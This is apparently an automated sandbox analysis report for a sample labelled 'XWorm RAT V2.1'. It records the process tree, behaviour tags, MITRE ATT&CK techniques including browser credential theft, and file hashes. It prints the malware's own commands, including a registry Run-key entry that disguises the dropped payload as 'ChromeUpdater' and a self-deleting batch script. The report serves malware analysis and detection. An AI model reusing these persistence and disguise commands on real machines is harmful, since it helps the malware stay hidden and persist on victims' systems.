  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3267251003648317961,2447038077790518460,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3244 /prefetch:2
  2⤵
  PID:1080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2292

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2552

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3552

C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:780
- C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\grmvs11e\grmvs11e.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4948
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5589.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc29B2F889CE7140718BC53CE6AB77225B.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5004
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC147.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpC147.tmp.bat
    3⤵
    PID:1708
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 2584"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:756
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:5092
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4116
  - - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
      "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
        5⤵
        
        PID:1904
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2600

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
24dada8956438ead89d9727022bac03a

SHA1
09b4fb1dba48ec8e47350131ae6113edd0fdecf0

SHA256
bf1e5c7828e4672982b16451b5a201e65e812e98a97b87c9f2f7c22677cb4ec1

SHA512
03f092a4b20a4d8cc111220b35fbf5470878b7723faeddee65b1d9cf327167053792c77864103b4530b9b9f819e32a5721b44189291dfdb5832769835ea5dd94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8b712a4c83dfb3c522d032cf900e863a

SHA1
4f5bec4be6f4ebfa959e899ceafc62309bb1f141

SHA256
31da2a41a051db11559c47feb923d4baad32a384f530013a435fa884dad64493

SHA512
03b24d9307623b3a341230805f3ea662b0107c314650a51ae7e89d901cb3ad212d4219bab4d763d0aa8d50831aa0e6d4e3379573cc2f724873804578e8642898

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\412223f2-8b93-403c-bcab-d27ee0cbc9aa.tmp

Filesize
874B

MD5
2bfc0f8de6d4458ca21bb0aa2c8c58b3

SHA1
15207b9957859e75a4089830e9d1add77957991c

SHA256
b4d056bdc29101c557938d399ec9a374fad40763d6b17b862147241c18cfe07d

SHA512
926daab7fa2b9dbeaf0b9d50a8797ec045e588f8e10b3363f627daf322ea2eb38a8a9d67839dc7d808d644f4d4376eb7b4b2337b9d84a3fd510a9d259791141a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
20KB

MD5
fe6e182c22ce8e0fca04e21242825a4b

SHA1
363fb33914dd0ff41a473aa2fc0f3d8e11670384

SHA256
6648d0b2d3cfade77810ab3e50524488fb4aa8e0dc843c66782c8742149d60ff

SHA512
7442d0b86bfa2386a8712e70a7af21adf0494800d55a518bf3bc1ad55a9f24a1c448c99e4ea5e5a9412105398b68255933a262a8ceab103b676645de039f65fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
cb8bd0f19b46706a0005cf544fdaaf17

SHA1
d319c70bfe5e4804bfb5c9f97cb6b5668ca1c7f6

SHA256
cf7693c2d3d0e898b47d1aea968b6097bcbcbf6517f152542fd6ab1aeec55ac9

SHA512
0ebb425615fde5c8c0eafcbbb80daf435af24be9b9d555d9a13f472d4ae4bbad95e42d3ac1f0314ce4a47fc8fee4e05f9acf270e65524087b69d985279941410

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
8aa13b973da3c3209a9c37d7789d61b7

SHA1
765d5da711ef5259263a887083a39dbac10b023e

SHA256
acee3069bd833b09370e0b4eb88dfe407dd3090df66289b45bd6adc3fca4751c

SHA512
58c6c8ff893f137aa385d5e4962372ab8eed8690d7fb025f6d51e2c705a9ab16214368c86550ea501673df7622b072b99846c7e5ab4e129e86d752861f3c3ff7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
2044e867baa339b4168f02544bbfb3f2

SHA1
c1663515acaa0a6cee4b8a107649e0574dcb7477

SHA256
d6b1b3b120dcb0e735ce6a94faa1ab5829cbb93b1d467ad5cc977f060388fd70

SHA512
536038c96a14a30d98f1d52f7bc6521f5ae0071ebb70d2440a7776cf1c7b3040f70494ef76b4d995c7b143c216baa6e790a1b3eac6a0789f2713d92be1eeb796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
986bb379da214dfb99a36e580b201811

SHA1
f9ae21229915155499efbee262111ceba50a73c8

SHA256
4a912448c0241f56ff36fd8642fbf110e63c7d2e9aab650bff232b0a04ae114d

SHA512
7487f2220f2814ad19d30fcca3c1a88c21fbff9159393078c34c1747a2fb20628c759c887432402cfe43c55d7449181a117064bafd5e11f70fe63be9de1c17ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe587f9b.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f9eedd9c292051206a1ad075155e0dbc

SHA1
c36a10c78bf81f056aff9b96390c40a884ac5418

SHA256
f379488e7455c473b176170b4dfae554b390189cc7400f6be6f04111a2835eac

SHA512
e1bfe3f887f9147bec2ccbae3f63c3393df6c513c93522b2a2378dd4afd05307e6053927c52e96d9f39c3075ac48a379d5c406bd2360eed53fc9beed28ffc2d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
515c395b292709ecda95c8ddf424f50c

SHA1
aa72776864e68e470aa157fbd27a7934165794ee

SHA256
c7263a82464c7d190687cb28eb451e37b185185914ea095c318852c5201beb8d

SHA512
a5fce48bd0d2924d7576afae5f4bb14875ffc301490ddfd1881317c6fe8fbc2802ab278d82dfaed15d810a82ccd609e2764714aa682e592125960a8983af54d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2e7c44e80c4e214533717d8d7e3e1aa8

SHA1
8930021649273fcc27674a23941c576d728b1176

SHA256
127036eea4321fee65631a4268eb7c3e17d89c633ad269b882a472e0dc49c063

SHA512
66afa00df5197dc2986d4536b027ded306f5ceb6a3e19dab492c1df2ccc2037d1814e460e55a455368ceb6faecfe6727bdee802b3f194a4193ed968a0d4443b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
eeec2f358f27603eb3faf83b3c955e87

SHA1
2a729082fe02d313def85315ad60cbbd225f181d

SHA256
00dd9624cce233c5327a6fdbf51a6702e55e5a41365aec6e88bb57da3a3135aa

SHA512
2784e300ee224bc115d468aa1cb43532b5d9459671844ef647b7148f6f3525667d2b301948e98c0e95fdd82a57619ecb5c1acd1b333e1c686541f435aa5040ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
99a7edf9124dba808b6d025b14aea278

SHA1
f1de2fdd81ea87ee78e8afdc1a7cdffcf62a92ef

SHA256
9d38a8d193a503b9be7b39be5d150bcf22038c84fbf3d53979e2f075a35b9089

SHA512
fc371b7ad5606a9948ba4a315e40a0a93592f57103be4a3712020977b43e4277d95d74ff35e490239dbce1cc475fe1d1746764f5970d2e9f04483c985268f5c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
85eca930a791cbcb1373f5fdaf17857b

SHA1
ffea7d54e9803374a484f1e4c124766e80024efc

SHA256
fbc990061790350f00dc28f2dda277aac81bb8385a6e92e90a20101436c3312c

SHA512
2ffe0de3f80ac60f2ffa55f334026979e6be328b7c69f4603aa3c5d1bfa6c3b3744d86ac2a34ecf904d0a41b36bc485392ece58f6cc89d7ffca293d02efe5bed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
86ce85af7b7de92146859aec4f2dd853

SHA1
e41db66142072041dd0125360aef4b943d44ca18

SHA256
00edbc6b11962806b9f6afb03352af532de996f2f142846834124cb0d0742966

SHA512
fa3566470135c3fd14ca70f5b915d118aa6be7a4c74a785d385761fab937240834f9fa9d812fc84a54857fa372a6d455ddcf1b783e35ec7295e174d9a8057aa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5908b7219f6f2091be03f968a49366cc

SHA1
d62c7d7241a6bc07da0d6bde73b603304dfc8b15

SHA256
e4b47596a7835c3ca46d8e9326b249db7e800669ca7d4a6e2f218ba3d1b2986e

SHA512
a5e9dd44cc5acc034f5033534f158d0911341b69130369c47cd1ad8d72285b41e37b38db906db1e043d4c83f60930dd44ddc180e76588f4a78b57876142e621f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8814c15d12aca1ce0cb4a92684c46023

SHA1
d891084719224e920b13d7eb469b3ca780a51738

SHA256
39287940f203727ae3f47ac1dc6da73178ce2d22601a52044106780228c6e602

SHA512
c959057c40ee4246c7b6df444a87c5d3796b9035d1ccc203fadea90659f6d1b4a06126436008e8359572686b45abc1bc2c99f3484ba79ad8ba03fbec39f68ad2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57bdc2.TMP

Filesize
706B

MD5
c2c217416d4cb62104da30e85b2d7a93

SHA1
c0943241e6de656ffac6eaea4bd93508662c56b8

SHA256
52e81d9e2934c1298de8d329e5b95592ba79731298944828d11a3f390e73dc57

SHA512
9caffe9aea03778bb9f7bfb8803ce80e3ddcc6274bf2e0e27cdb94948477c9878e6277b7cf77bdbe3f0ac2fbf315dc123cd7f2a6a2ba3aa919dd57536ece86a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
db94064611a4484ae10ca49150b24d7a

SHA1
2b3fdf1b2e6d2b175d6eb86b2955c534404023d9

SHA256
a80e4c7e6e0d8a5e7d27ecbdbae1c4c0e2f5dd088e4013ee8e1978d74beab562

SHA512
5d1aba4ef7662565fa993bbdbbf2df721d87b5a84089138ca676f8d0710a769cad9b3b2d623b6dddb394a2e209b3a6e64dd68312e72d725cdf5f4b551923b729

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
305c027fe5d602fbfef3df39516e39a5

SHA1
c3b694fb241861a485f33b21df9b1d6c0c907c5b

SHA256
b94d47b3b20d8c8fe300768206e9600c3848876378eb629820b3bf5d30db9c37

SHA512
db76517959d22d1057a711ce69ed4be3f96b5f07c354c3b22315c16eaa8cf16293ca2f16bc62f60448b9193a7fa38311f414499020329d80febd314bd415e153

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
b8703418e6c3d1ccd83b8d178ab9f4c9

SHA1
6fb0e1e0ee5bc745f52a1c29e3cf4b88a2298dd6

SHA256
d6e9972976881d3dad7ac2a0c66cd7dd81420908aae8b00195a02fdf756cfc5e

SHA512
75ff6e911691e3d0d32c25d4b6d275a2b6157dae418ce5507f3e3f1b321c3f0dee516b7db0fd6588860019a19862f43c5335c465829de7a418a71999b71cfc3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5589.tmp

Filesize
1KB

MD5
0e15a2ead391283ad635e7a825f4c3b6

SHA1
afd635304aaa2372c9c864e282ca617f1dde42b3

SHA256
2801bc5a352d44e1c86b9cd21cbcfcb5e36434eff18f6fa5d003576940d967a2

SHA512
0f62265fb64c088b7725704000a70f17a5a887f71b14dfbb16f060a7885cb2ee630e3cb36f67b2d287244035b242b01d7fa55f94c21ea4f2869de79fe672f9fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\grmvs11e\grmvs11e.0.vb

Filesize
60KB

MD5
8ad5a3d1defa9fcfaafaa5311eb6d677

SHA1
61e1bff444a1937b453a2bfce17dcfb01198a0dd

SHA256
bc546428be14df45cbbebec4623ec8054d5b95c4b496b58a561c60d80be79cd0

SHA512
242ed131c381a183b657c943a3cd4fb094fd4bbf74e30925224f28c806dc55c87352f33f89ef33f95fca5c3bc86e33b4036733c071ad6abeae67090a9b5519c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\grmvs11e\grmvs11e.cmdline

Filesize
316B

MD5
3e4a1475085fbabf3f3b43174053cb4c

SHA1
8ad000ab9376eb08466c25cbd5f2d593da2df049

SHA256
c702aad9418eb22ea42877a5272d8f2eaf83a400a649be56bbdb87ab89474b4f

SHA512
fb6a9fdf32c61cf9dbe6cc44474d32c00ea5b6604c8a523597eedf993c62e6e40b148e8da34845d15f2b95ab12ff9f0668104d74bb0a01ea48fc8a988d9a01f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC147.tmp.bat

Filesize
290B

MD5
e7aacd80044663f7aac921dda71823c2

SHA1
12e66b47d8cccea7b30a3395b39af4fd8559456e

SHA256
7376aa8581f5514b4caa7932297d49027e1886f6cc1a41f8cd5d5435ebfdb971

SHA512
6f7fcd42b2ed5e912e8250483670987630bd29566b4c223f8275ebbfee4df4fb6be220eb0a7585b505ee174992105c3508ed6a8d8f90cbcc05e42f6c86d735b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbc29B2F889CE7140718BC53CE6AB77225B.TMP

Filesize
1KB

MD5
b70192bdfa82953d23893557b94122f2

SHA1
4fd73efd6a6b28f57df1dde6a4241526c5b0fb60

SHA256
6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4

SHA512
6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
3a5c9706a3aaf8098b22eef3730f796d

SHA1
027dd1b4b7dbe8c8db1142e3d2b46e1765fa7534

SHA256
27ff94de1066b36512d2154c713ed98e72a592877adf2f25d6db9e01cd52432d

SHA512
5fb725edc408c8bf93db526aad4c92680180400a8f1c6c501d96325a855c842affacbd0543a858b4bc8c671408a58b6417bbcb1ffcf657fdb0d575c6a51382dd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
9c3a7ed58277370f0d0a7a259d34b7e5

SHA1
7a040798ad28b4acea98ddf359577a65db0ca9eb

SHA256
67e6f8520fcb7624f33e0088eba4583dfcbaf1fd761ad0f2c51433e39251aa52

SHA512
f1c2980558eaea5eea7cb23c609897d76bff1bb70b73b2dbd8ab53dbd882791170cf359b525d95fdc4fee5e109512c0fc8adbc7c24ffb649dfba542b14283b8e

Download Submit
C:\Users\Admin\Downloads\XWorm-RAT-xworm.zip

Filesize
34.0MB

MD5
753c531a6bdbd3c76739cf65fd2b19e9

SHA1
5438634fadd98dc63a7ff35621f0c87c1751af1d

SHA256
83bde3ffc07740d721b36d9d92ab945b9e6c4216decf98c0ee06017223b010c2

SHA512
9f7caed8266b55c24ca8c14ec52040772c691c279a5a553191732c0ee962c3674765590ffa6b69986d8da0e3732ae672d8b15908c9c1d9484b3a560ff5650b70

Download Submit
memory/780-506-0x0000000000E50000-0x0000000001092000-memory.dmp

Filesize
2.3MB

Download
memory/780-507-0x0000000005F80000-0x0000000006526000-memory.dmp

Filesize
5.6MB

Download
memory/1720-534-0x000001E652340000-0x000001E652362000-memory.dmp

Filesize
136KB

Download
memory/1720-531-0x000001E652220000-0x000001E65228A000-memory.dmp

Filesize
424KB

Download
memory/1720-535-0x000001E652420000-0x000001E65245A000-memory.dmp

Filesize
232KB

Download
memory/1720-530-0x000001E651C70000-0x000001E651C7A000-memory.dmp

Filesize
40KB

Download
memory/1720-536-0x000001E651C40000-0x000001E651C66000-memory.dmp

Filesize
152KB

Download
memory/1720-532-0x000001E652290000-0x000001E652342000-memory.dmp

Filesize
712KB

Download
memory/1720-533-0x000001E652390000-0x000001E6523E0000-memory.dmp

Filesize
320KB

Download
memory/1720-541-0x000001E652400000-0x000001E652412000-memory.dmp

Filesize
72KB

Download
memory/2584-515-0x0000022DED260000-0x0000022DED800000-memory.dmp

Filesize
5.6MB

Download
memory/2584-521-0x0000022DEFC90000-0x0000022DEFD06000-memory.dmp

Filesize
472KB

Download
memory/2584-522-0x0000022DEDC20000-0x0000022DEDC3E000-memory.dmp

Filesize
120KB

Download
memory/4852-523-0x00000000096C0000-0x0000000009726000-memory.dmp

Filesize
408KB

Download
memory/4852-513-0x0000000005140000-0x000000000514A000-memory.dmp

Filesize
40KB

Download
memory/4852-514-0x0000000005260000-0x00000000052B6000-memory.dmp

Filesize
344KB

Download
memory/4852-512-0x00000000051C0000-0x0000000005252000-memory.dmp

Filesize
584KB

Download
memory/4852-509-0x0000000005080000-0x000000000511C000-memory.dmp

Filesize
624KB

Download
memory/4852-508-0x00000000001A0000-0x0000000000832000-memory.dmp

Filesize
6.6MB

Download